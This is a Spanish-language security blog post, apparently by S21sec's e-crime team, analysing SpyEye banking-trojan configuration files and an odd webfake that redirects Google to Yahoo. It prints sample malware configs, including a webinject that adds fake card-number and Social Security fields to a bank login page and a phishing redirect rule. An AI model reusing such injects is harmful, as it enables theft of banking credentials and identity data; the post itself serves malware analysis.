Español | English
rss facebook linkedin Twitter

Un webfake del troyano SpyEye que llamará la atención

¿Estas viendo el buscador de yahoo más de lo necesario? Si es así sigue leyendo.

Hace unos meses comentábamos como SpyEye incorporaba técnicas de Man in the Browser, y últimamente se están viendo diversos movimientos y más cambios en sus archivos de configuración. Todo ello refuerza la teoría de que este troyano se está convirtiendo en el nuevo sucesor de ZeuS.

Las últimas muestras analizadas incorporan nuevos módulos y funcionalidades pero siempre vienen con configuraciones de las 3 técnicas más usadas y conocidas de robo de datos:
  • Screenshots.txt: Este archivo incorpora las URLs de los objetivos de los cuales tomará captura de pantalla junto con las coordenadas de su zona concreta. Así cuando el usuario visite su banco-online.com, tomará las capturas de pantalla con los dígitos introducidos. Ejemplo:
    *banco-online.com* 300 300 10000 900

  • Webinjects.txt: Este archivo incorpora las definiciones de los datos que inyectará cuando el usuario visite su banco-online.com. Ejemplo (escapado para que blogger no lo interprete):

  •  set_url https://banco-online.com/*/*/signoff/SummaryRecord.* GP
    data_before
    <input type="password" id="pwd" name="password" size="21" maxlength="50" value="">
    </div>
    </div>
    data_end
    data_inject
    <div id="pword">
    <label class="formLabel" for="pwd">
    ATM/Debit Card # (CIN):
    </label>
    <div class="formHelp"></div>
    <div style="clear:both;">
    <input type="password" id="USpass" name="USpass" size="16" maxlength="50" value="">
    </div>
    </div>
    <div id="pword">
    <label class="formLabel" for="pwd">
    Social Security or Tax ID #:
    </label>
    <div style="clear:both;">
    <input type="password" id="socsec_or_taxid" name="socsec_or_taxid" size="4" maxlength="50" value="">
    </div>
    </div>
    data_end
    data_after
    data_end

    De esta forma inyectará los campos que necesite para recopilar datos del segundo factor de autenticación necesarios para realizar transferencias. El usuario se fiará porque realmente está en la web de su banco con el candado.
  • Webfakes.dll.cfg: Este archivo incorporará los objetivos a partir de los cuales en cuanto el usuario los teclee en su navegador redirigirá a otros sitios comprometidos que suplantarán su identidad para recopilar credenciales: todo ello al más puro estilo phishing. Ejemplo:
    "https://*banco-online.com*" "http://web-comprometida.com/public/DIR_6201/banco-online-fake" "P" "*notredirect=*" "*pin*_IN=*"

Es en esta última técnica donde en los últimos días nos hemos encontrado con la siguiente curiosa configuración de webfake:
"http://www.google.com" "http://www.yahoo.com" "GP" "" ""

¿Cuál será el objetivo de los atacantes?; ¿una denegación de servicio a yahoo?, ¿o un apoyo comercial desde el lado oscuro?. En cualquier caso, un punto negativo para el atacante ya que en lugar de intentar permanecer oculto estará llamando la máxima atención del usuario infectado.


Dpto Inteligencia
S21sec e-crime

1 comentario:

Anónimo dijo...

Quizas se podra utilizar para susplantar google y generar adsense.

Saludos,
AnonimoK


(+34 902 222 521)


24 horas / 7 días a la semana



© Copyright S21sec 2013 - Todos los derechos reservados


login